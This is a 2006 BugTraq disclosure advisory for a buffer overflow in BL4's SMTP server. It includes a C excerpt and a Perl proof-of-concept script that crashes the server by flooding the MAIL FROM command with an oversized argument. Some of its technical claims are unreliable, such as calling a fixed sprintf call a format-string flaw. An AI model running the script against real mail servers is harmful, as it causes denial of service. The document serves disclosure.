BugTraq
BL4's SMTP server BufferOverflow Vulnerable Apr 27 2006 08:24AM
the_day echo or id
------------------------------------------------------------------------
---

[ECHO_ADV_30$2006] BL4's SMTP server BufferOverflow Vulnerable

------------------------------------------------------------------------
---

Author : Dedi Dwianto

Date : April, 27th 2006

Location : Indonesia, Jakarta

Web : http://advisories.echo.or.id/adv/adv30-theday-2006.txt

Critical Lvl : High

------------------------------------------------------------------------
---

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : BL4's SMTP server

version : < 0.1.5

URL : http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0

Description :

BL4's SMTP server is an inbound only SMTP server.

It currently uses hardcoded values for handling email.

The SMTP server puts the incoming email into various text files.

------------------------------------------------------------------------
---

Vulnerability:

~~~~~~~~~~~~~~~~

BL4's SMTP server is to a flaw that can allow remote attacker to

cause a denial of service or a attacker can Execution of Arbitrary Code.

The vulnerability is due to a buffer overflow in the SMTP service.

A remote attacker can repeatedly send more that 2100 bytes as the argument to the HELO, MAIL FROM, and RCPT TO commands to crash the server.

------------------think.c-----------------------------------

...........

{

slaveEmail[x]->isData = 0;

slaveEmail[x]->emailFrom = 0;

slaveEmail[x]->emailTo = 0;

free(buffer);

buffer = malloc(sizeof(char) * 12);

sprintf(buffer, "250 OK\r\n");

return buffer;

}

free(buffer);

.............

slaveEmail[x]->EHLO = buffer;

slaveEmail[x]->EHLOtrue = 1;

buffer = malloc(sizeof(char) * 12);

sprintf(buffer, "250 OK\r\n");

return buffer;

-----------------------------------------------------------

--

sprintf(buffer, "250 OK\r\n");

--

Vulnerable for format strings.

--

free(buffer);

buffer = malloc(sizeof(char) * 12);

--

Vulnerable for buffer overflow.

A attacker can create Arbitrary Code here .

Poc:

~~~~~~~~~~~~

#!/usr/bin/perl

use IO::Socket;

use Socket;

my($socket) = "";

if($#ARGV < 1 | $#ARGV > 2) {usage()}

if($#ARGV > 2) { $prt = $ARGV[1] } else { $prt = "25" };

$adr = $ARGV[0];

$prt = $ARGV[1];

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,

PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";

print " -- Connecting To SMTP server at $adr port $prt ... \n";

sleep(1);

print $socket "EHLO yahoo.com\r\n" and print " -- Sending Request to $adr .....\n" or die "Error : can't send Request\n";

sleep(1);

print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n" and print " -- Sending Buffer to $adr .....\n";

sleep(1);

printf("[+]Ok!\n");

printf("[+]Crash service.....\n");

printf("[~]Done.\n");

close($socket);

sub usage()

{

print "\n=========================================\r\n";

print " BL4's SMTP server Remote DOS \r\n";

print "=========================================\r\n";

print " Bug Found by Dedi Dwianto \r\n";

print " www.echo.or.id #e-c-h-o irc.dal.net \r\n";

print " Echo Security Research Group \r\n";

print "=========================================\r\n";

print " Usage: perl bl4-explo.pl [target] [port] \r\n\n";

exit();

}

------------------------------------------------------------------------
---

Shoutz:

~~~~~~~

~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous

~ newbie_hacker (at) yahoogroups (dot) com [email concealed]

~ #aikmel #e-c-h-o @irc.dal.net

------------------------------------------------------------------------
---

Contact:

~~~~~~~~

Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id

Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus